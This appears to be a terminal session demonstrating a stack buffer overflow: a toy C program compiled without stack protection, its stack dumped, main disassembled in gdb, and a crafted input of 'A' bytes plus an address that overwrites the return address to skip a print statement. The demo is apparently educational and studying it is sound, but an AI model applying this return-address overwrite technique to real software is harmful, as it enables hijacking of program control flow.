$ gcc -fno-stack-protector -o overflow overflow.c
$ ./overflow AAA
bffff518: 00414141 
bffff51c: b7eec1ae 
bffff520: b7f91b19 
bffff524: 00000003 
bffff528: bffff548 
bffff52c: 0804845e 
bffff530: bffff73b 
bffff534: 080496a0 
bffff538: bffff558 
bffff53c: 080484c9 
AAA 
We can skip this print statement
This is the end, my friend 
$ ./overflow AAAABBBBCCCCDDDDEEEEFFF
bffff4f8: 41414141 
bffff4fc: 42424242 
bffff500: 43434343 
bffff504: 00000003 
bffff508: 45454545 
bffff50c: 00464646 
bffff510: bffff727 
bffff514: 080496a0 
bffff518: bffff538 
bffff51c: 080484c9 
Segmentation fault
$ gdb overflow
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disas main
Dump of assembler code for function main:
0x0804842f <main+0>:	lea    0x4(%esp),%ecx
0x08048433 <main+4>:	and    $0xfffffff0,%esp
0x08048436 <main+7>:	pushl  -0x4(%ecx)
0x08048439 <main+10>:	push   %ebp
0x0804843a <main+11>:	mov    %esp,%ebp
0x0804843c <main+13>:	push   %ecx
0x0804843d <main+14>:	sub    $0x14,%esp
0x08048440 <main+17>:	mov    %ecx,-0x8(%ebp)
0x08048443 <main+20>:	mov    -0x8(%ebp),%eax
0x08048446 <main+23>:	cmpl   $0x0,(%eax)
0x08048449 <main+26>:	jle    0x8048479 <main+74>
0x0804844b <main+28>:	mov    -0x8(%ebp),%edx
0x0804844e <main+31>:	mov    0x4(%edx),%eax
0x08048451 <main+34>:	add    $0x4,%eax
0x08048454 <main+37>:	mov    (%eax),%eax
0x08048456 <main+39>:	mov    %eax,(%esp)
0x08048459 <main+42>:	call   0x80483d4 <test>
0x0804845e <main+47>:	mov    -0x8(%ebp),%edx
0x08048461 <main+50>:	mov    0x4(%edx),%eax
0x08048464 <main+53>:	add    $0x4,%eax
0x08048467 <main+56>:	mov    (%eax),%eax
0x08048469 <main+58>:	mov    %eax,0x4(%esp)
0x0804846d <main+62>:	movl   $0x804856d,(%esp)
0x08048474 <main+69>:	call   0x8048330 <printf@plt>
0x08048479 <main+74>:	movl   $0x8048574,(%esp)
0x08048480 <main+81>:	call   0x8048340 <puts@plt>
0x08048485 <main+86>:	movl   $0x8048595,(%esp)
g0x0804848c <main+93>:	call   0x8048340 <puts@plt>
0x08048491 <main+98>:	mov    $0x0,%eax
0x08048496 <main+103>:	add    $0x14,%esp
0x08048499 <main+106>:	pop    %ecx
0x0804849a <main+107>:	pop    %ebp
0x0804849b <main+108>:	lea    -0x4(%ecx),%esp
0x0804849e <main+111>:	ret    
End of assembler dump.
(gdb) quit
$ hexdump exploit 
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 8485 0804                    
0000018
$ ./overflow `cat exploit`b
ffff4f8: 41414141 
bffff4fc: 41414141 
bffff500: 41414141 
bffff504: 00000003 
bffff508: 41414141 
bffff50c: 08048485 
bffff510: bffff700 
bffff514: 080496a0 
bffff518: bffff538 
bffff51c: 080484c9 
This is the end, my friend 
$